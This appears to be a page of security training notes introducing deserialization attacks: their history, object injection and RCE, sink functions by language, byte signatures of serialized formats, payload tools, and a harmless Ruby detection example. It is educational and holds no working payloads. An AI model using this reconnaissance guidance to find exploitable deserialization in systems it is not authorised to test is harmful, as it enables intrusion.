Introduction to Deserialization Attacks

Introduction

If an application ever deserializes user-controlled data, there is a possibility for a deserialization attack to occur. An attack involves:

Modifying serialized data generated by the application
Generating and supplying custom serialized data

History

2011 - Deserialization known as attack vector
2015 - Security researchers @frohoff and @gebl released ysoserial (Java deserialization payloads)
2016 - Java Deserialization Apocalypse went viral
Now - OWASP Top 10: A08:2021-Software and Data Integrity Failures

Attack Types

Object Injection

Modifying serialized data so the server receives unintended information upon deserialization.

Example: Modifying a serialized object containing user role to gain admin privileges.

Remote Code Execution

Supplying a serialized payload that results in command execution upon deserialization.

Identifying Serialization

White-Box (Source Code Access)

Look for specific function calls:

Language

Function

PHP

unserialize()

Python Pickle

pickle.loads()

Python JSONPickle

jsonpickle.decode()

Python PyYAML

yaml.load()

Java

readObject()

C# / .NET

Deserialize()

Ruby

Marshal.load()

Black-Box (No Source Code)

Identify serialized data by format:

Format

Language/Protocol

a:4:{i:0;s:4:"Test";...}

PHP

(lp0\nS'Test'\np1\n...

Pickle Protocol 0 (Python 2.x default)

Hex: 80 01 ... .

Pickle Protocol 1 (Python 2.x)

Hex: 80 02 ... .

Pickle Protocol 2 (Python 2.3+)

Hex: 80 03 ... .

Pickle Protocol 3 (Python 3.0-3.7 default)

Hex: 80 04 95 ... .

Pickle Protocol 4 (Python 3.8+ default)

Hex: 80 05 95 ... .

Pickle Protocol 5 (Python 3.x)

["Test", "Data", [4], "ACADEMY"]

JSONPickle (Python 2.7/3.6+)

- Test\n- Data\n...

PyYAML / ruamel.yaml

Hex: AC ED 00 05 73 72 / Base64: rO0ABXNy

Java

Hex: 00 01 00 00 00 ff ff ff ff / Base64: AAEAAAD/////

C# / .NET

Hex: 04 08

Ruby

Tools

Freddy - Burp Suite extension for detecting and exploiting Java/.NET serialization
ysoserial - Java deserialization payload generator

Identifying Language from Serialized Data

Example: Ruby Detection

echo 'BAhbD2kGaQdpCGkJaQppC2kMaQ1pDmkA' | base64 -d | xxd

00000000: 0408 5b0f 6906 6907 6908 6909 690a 690b  ..[.i.i.i.i.i.i.
00000010: 690c 690d 690e 6900                      i.i.i.i.

Hex bytes starting with 04 08 → Ruby

PreviousIntroduction to Serialization Next[PHP Deserialization]

Last updated 13 days ago

hashtagIntroduction

hashtagHistory

hashtagAttack Types

hashtagObject Injection

hashtagRemote Code Execution

hashtagIdentifying Serialization

hashtagWhite-Box (Source Code Access)

hashtagBlack-Box (No Source Code)

hashtagTools

hashtagIdentifying Language from Serialized Data

hashtagExample: Ruby Detection